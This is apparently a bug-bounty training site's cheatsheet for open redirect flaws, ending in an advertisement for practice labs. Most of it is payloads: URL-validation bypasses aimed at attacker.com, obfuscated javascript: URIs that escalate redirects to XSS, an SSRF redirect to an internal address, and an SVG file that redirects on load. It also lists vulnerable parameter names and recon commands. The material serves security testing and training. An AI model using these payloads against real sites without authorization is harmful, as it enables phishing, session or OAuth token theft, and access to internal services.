Open Redirect Cheatsheet

Open Redirect

Quick reference

  • Open redirect is usually only accepted as P4/informative — always escalate to XSS, SSRF or OAuth token theft
  • Try the javascript: URI in every redirection parameter to escalate to XSS
  • Combine with OAuth: an open redirect in redirect_uri lets you steal authorization codes
  • In Electron apps, open redirect can escalate to RCE if nodeIntegration is enabled

Domain validation bypass

Subdomain of the allowed domain

https://allowed_domain.attacker.com

Credentials in URL

https://allowed_domain@attacker.com

Fragment

https://attacker.com#allowed_domain

Query parameter

https://attacker.com?allowed_domain

Backslash

https://attacker.com\allowed_domain

Multiple slashes

http:///////////attacker.com

Mixed backslash

http:\\attacker.com

AMP redirect

https://google.com/amp/s/attacker.com

Escalation to XSS (javascript: URI)

Basic javascript:

javascript:alert(1)

Null byte bypass

java%00script:alert(1)

Newline bypass

java%0Ascript:alert(1)

Tab bypass

java	script:alert(1)

Double encoding

javascript://%250Aalert(1)

Whitespace + tab

%09Jav%09ascript:alert(document.domain)

With whitelisted domain

javascript://https://whitelisted.com/?z=%0Aalert(1)

jaVAscript with domain

jaVAscript://whitelisted.com//%0d%0aalert(1);//

Advanced payloads

Path parameter redirect to SSRFAn internal open redirect can escalate to SSRF

/product/nextProduct?path=http://192.168.0.12:8080/admin

SVG file upload redirect

<?xml version="1.0" standalone="yes"?>
<svg onload="window.location='http://attacker.com'" xmlns="http://www.w3.org/2000/svg"></svg>

DOM-based redirectLook in JS for: location.href = param

https://target.com/post?postId=4&url=https://attacker.com/

Advanced encoded characters

%26%2302java%26%23115cript:alert(document.domain)

Common vulnerable parameters

Redirection parametersTry each parameter with the attacker's URL

?next= ?url= ?redirect= ?redirect_uri= ?return= ?returnTo= ?continue= ?dest= ?destination= ?redir= ?go= ?forward= ?checkout_url= ?callback_url=

Login/logout parameters

?login= ?logout= ?return_path= ?return_to= ?service=

Resource parameters

?image_url= ?src= ?link= ?location= ?uri= ?u=

Tools

Oralyzer

Automated open redirect scanner that tries multiple payloads

python3 oralyzer.py -l urls.txt

gau + grep

Finds historical URLs with potentially vulnerable parameters

echo "target.com" | gau | grep -iE "(redirect|url|next|return|go)="

Ready to practice?

Put these payloads to work in real labs based on bug bounty reports.

See practice labs
hunters training
650

hunters training

labs from real reports
50

labs from real reports

completions
380

completions

in bounties practiced
$200,000

in bounties practiced

40 flags captured this week·Real reports from HackerOne · Bugcrowd · Intigriti·No commitment·Free Academy
BBLabs · bug bounty training

Stop reading about bugs and start hunting them

Create your free account and practice on labs based on real reports that paid out thousands of euros. The Academy is free forever.

No card · free Academy · cancel anytime